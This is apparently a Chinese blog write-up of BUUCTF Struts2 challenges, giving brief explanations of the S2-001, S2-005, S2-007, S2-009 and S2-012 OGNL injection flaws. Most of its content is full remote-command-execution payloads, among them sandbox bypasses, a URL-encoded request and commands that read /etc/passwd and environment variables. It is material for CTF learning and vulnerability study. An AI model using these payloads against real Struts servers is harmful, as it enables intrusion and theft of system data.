[BUUCTF] real-struts2

最新推荐文章于 2024-03-26 07:28:11 发布
最新推荐文章于 2024-03-26 07:28:11 发布
阅读量409 收藏
点赞数 1
分类专栏: CTF 文章标签: struts tomcat java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dannie01/article/details/120663117
版权

s2-001

原理

该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行

漏洞原理分析

  • 获取tomcat执行路径:
%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}
  • 获取Web路径:
%{
#req=@org.apache.struts2.ServletActionContext@getRequest(),
#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),
#response.println(#req.getRealPath('/')),
#response.flush(),
#response.close()
}
  • 执行命令:
%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

payload:

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"env"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

s2-005

漏洞原理

s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞,攻击者可以利用OGNL表达式将这2个选项打开,S2-003的修补方案把自己上了一个锁,但是把锁钥匙给插在了锁头上

漏洞原理分析

payload:

?%28%27%5Cu0023context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27env%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte[51020]%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29

这里把所有字符都转换为url编码形式了

s2-007

漏洞原理:

S2-007漏洞一般出现在表单处。当配置了验证规则 -validation.xml 时,若类型验证转换出错,后端默认会将用户提交的表单值通过字符串拼接,然后执行一次 OGNL 表达式解析并返回。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式。
age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞。

影响版本 2.0.0 - 2.2.3

漏洞分析&利用

  • 姿势1

poc1:

' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())) + '

poc2:

' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream())) + '

%{
#req=@org.apache.struts2.ServletActionContext@getRequest(),
#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),
#response.println(#req.getRealPath('/')),
#response.flush(),
#response.close()
}

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

s2-009

漏洞原理:

OGNL提供了广泛的表达式评估功能等功能。该漏洞允许恶意用户绕过ParametersInterceptor内置的所有保护(正则表达式,拒绝方法调用),从而能够将任何暴露的字符串变量中的恶意表达式注入进行进一步评估。ParametersInterceptor中的正则表达式将top [‘foo’](0)作为有效的表达式匹配,OGNL将其作为(top [‘foo’])(0)处理,并将“foo”操作参数的值作为OGNL表达式求值。这使得恶意用户将任意的OGNL语句放入由操作公开的任何String变量中,并将其评估为OGNL表达式,并且由于OGNL语句在HTTP参数中,攻击者可以使用黑名单字符(例如#)禁用方法执行并执行任意方法,绕过ParametersInterceptor和OGNL库保护。

影响版本:Struts 2.1.0 - 2.3.1.1

漏洞分析&利用

poc:

ajax/example5.action?age=12313&name=(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]=true, #a=@java.lang.Runtime@getRuntime().exec('ls').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[51020],#c.read(#d),#kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kxlzx.println(#d),#kxlzx.close())(meh)&z[(name)('meh')]

poc:

/ajax/example5.action?age=12313&name=(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]=true, #a=@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[51020],#c.read(#d),#kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kxlzx.println(#d),#kxlzx.close())(meh)&z[(name)('meh')]

poc2:

Poc2:
 
POST /ajax/example5 HTTP/1.1
 
Accept: */*
 
Connection: keep-alive
 
Content-Type: application/x-www-form-urlencoded
 
Content-Length: 425
 
Host: ********************
 
z[%28name%29%28%27meh%27%29]&age=12313&name=(#context["xwork.MethodAccessor.denyMethodExecution"]=false,#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('id').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#s=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#s.println(#d),#s.close())(meh)

s2-012

漏洞原理:

如果在配置 Action 中 Result 时使用了重定向类型,并且还使用 ${param_name} 作为重定向变量,UserAction 中定义有一个 name 变量,当触发 redirect 类型返回时,Struts2 获取使用 ${name} 获取其值,在这个过程中会对 name 参数的值执行 OGNL 表达式解析,从而可以插入任意 OGNL 表达式导致命令执行。

影响版本:Struts 2.1.0-2.3.13

poc:

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"/bin/bash","-c", "ls"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

poc2:

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat", "/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

paylaod:

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"/bin/bash","-c", "env"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

s2-015

漏洞原理:

J1A
关注
专栏目录
buuctf [struts2]s2-045
qq_1873822的博客
03-16 758
漏洞介绍 Apache Struts 2被曝存在远程命令执行漏洞,漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。 恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。
struts2系列-Real-BUUCTF平台
~airrudder~
04-24 3873
本篇内容 [PHP]XXE [ThinkPHP]5-Rce [ThinkPHP]5.0.23-Rce [ThinkPHP]2-Rce 上一篇 | 目录 | 下一篇 [PHP]XXE 打开就显示phpinfo,直接搜索flag就出来了。 不知道是不是环境坏了。 [ThinkPHP]5-Rce [ThinkPHP]5.0.23-Rce [ThinkPHP]2-Rce ...
buuctf-Real-[ThinkPHP]5.0.23-Rce
weixin_46079186的博客
05-09 675
题目地址 和前两题一样,去找poc 找到poc ,使用查看一下效果有回显。 根据前两题经验,flag肯定在phpinfo 里面 ,所以直接修改一下,拿到flag
buuctf [struts2]s2-005
qq_1873822的博客
03-21 455
漏洞简介 通过unicode 编码 \u0023 绕过struts对#的过滤,再通过设置xwork.MethodAccessor.denyMethodExecution 为false 和memberAccess.allowStaticMethodAccess为true 来绕过沙盒 https://blog.csdn.net/Fly_hps/article/details/85000125 POC /example/HelloWorld.action?%28%27%5Cu0023context[%5C%27
S2-005 远程代码执行漏洞检测与利用
a1b2c3是弱口令
12-11 2894
s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法...
BUUCTF-Real
weixin_43821278的博客
03-08 5000
BUUCTF-Real
BUUCTF REAL
A_dmin的博客
01-30 4359
BUUCTF REAL flag好像都在系统环境变量中,phpinfo中就能看见,,,, [PHP]XXE libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡 dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞 payload: <?xml version="1.0" encoding="utf-...
BUUCTF-Real-[struts2]s2-013
分享
02-03 469
s2-013中,因为参数的问题导致rce漏洞的出现!
Real-Time Rendering, Fourth Edition PDF
09-02
Real-Time Rendering, Fourth Edition 实时渲染最新版 第四版PDF,下载地址见文档....
Real-Time Rendering 4th Edition完整版 全彩 892MB
09-12
Real-Time Rendering 4th Edition完整版 全彩 pdf 892MB 这里挂的是百度云链接
Real-Time Rendering 4th Edition 全彩892M百度网盘下载地址
11-12
根据提供的文件信息,我们可以推断出这是一本关于实时渲染技术的专业书籍——《Real-Time Rendering 第四版》。下面将围绕这一主题展开详细介绍,并提取出关键知识点。 ### 实时渲染技术概览 实时渲染(Real-Time ...
【图像超分/扩散模型】论文精读:Exploiting Diffusion Prior for Real-World Image Super-Resolution(StableSR)
最新发布
畅游计算机视觉的海洋
03-26 7696
我们提出了一种新的方法来利用封装在预先训练的文本到图像扩散模型中的先验知识进行盲超分辨率(SR)。具体来说,通过使用我们的时间感知编码器,我们可以在不改变预训练的合成模型的情况下实现有希望的恢复结果,从而保留生成先验并最小化训练成本。为了解决扩散模型固有随机性造成的保真度损失,我们采用了一个可控的特征包装模块,该模块允许用户在推理过程中简单地调整标量值来平衡质量和保真度。此外,我们开发了一种渐进聚合采样策略来克服预训练扩散模型的固定大小约束,从而能够适应任何大小的分辨率。
【TCP/IP详解(I)】四层协议概述
热门推荐
Dannie01的博客
08-09 1万+
网络分层 网络协议通常分不同层次进行开发,每一层分别负责不同的通信功能。一个协议族,比如TCP/IP,是一组不同层次上的多个协议的组合。TCP/IP通常被认为是一个四层协议系统 每一层负责不同的功能,从底层向上分别是: (1) 链路层 有时也称作数据链路层或网络接口层, 通常包括操作系统中的设备驱动程序和计算机中对应的网络接口卡。 它们一起处理与电缆(或其他任何传输媒介)的物理接口细节。 (2) 网络层 有时也称作互联网层,处理分组在网络中的活动,例如分组的选路。 在TCP/IP协议族中,网络层协议包括
[BUUCTF] 备赛刷题第一天
Dannie01的博客
11-01 2285
[极客大挑战 2019]RCE ME Wallbreaker_Easy 绕过disabled function 狠简单 一把嗦 [SUCTF 2019]EasyWeb <?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_ex
[BUUCTF] 备赛刷题第二天
Dannie01的博客
11-03 1901
刷题目录[WUSTCTF2020]CV Maker[RootersCTF2019]I_<3_Flask拓宽思路 多多尝试常见SSTI的payload收集官方漏洞利用方法WAF绕过新姿势:[CISCN2019 华东南赛区]Double Secret做题思路总结[NPUCTF2020]ezinclude【预期解】【非预期解】做题思路总结 [WUSTCTF2020]CV Maker 漏洞源码: from flask import Flask, render_template_string, request
[BUUCTF] 集训第六天
Dannie01的博客
10-03 1483
[BSidesCF 2019]Futurella 火星文 复制粘贴搜索框就可以获得flag 看源码 轻易得不敢copy flag [GYCTF2020]FlaskApp 这里会自动重定向到xss平台,很迷 flask debug可以找到源码 flasky 尝试ssti模板注入 先重定向 点击返回拿到base64编码去解码 同理点击+返回操作 {{7*7}}不可以 {{7+7}}可以 别问为什么 有waf 读app.py {% for c in [].__class__.__base__.__
[BUUCTF] 备赛刷题第四天
Dannie01的博客
11-05 1313
[红明谷CTF 2021]write_shell 源码 <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }els
【虚拟机】安装kali时所遇问题
Dannie01的博客
01-24 1024
安装kali时提示“你的网络可能并未使用DHCP协议” windows+services.msc进入服务界面 这五个都要开启! 安装Linux时的HTTP代理信息怎么填? 不需要设置代理的(直接点击“继续”按钮),代理只是在个别情况才需要,即使需要HTTP代理安装好了以后也可以再另外设置,虚拟机安装的Kali Linux在虚拟机网卡设置里面,设置成桥接就可以联网了。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值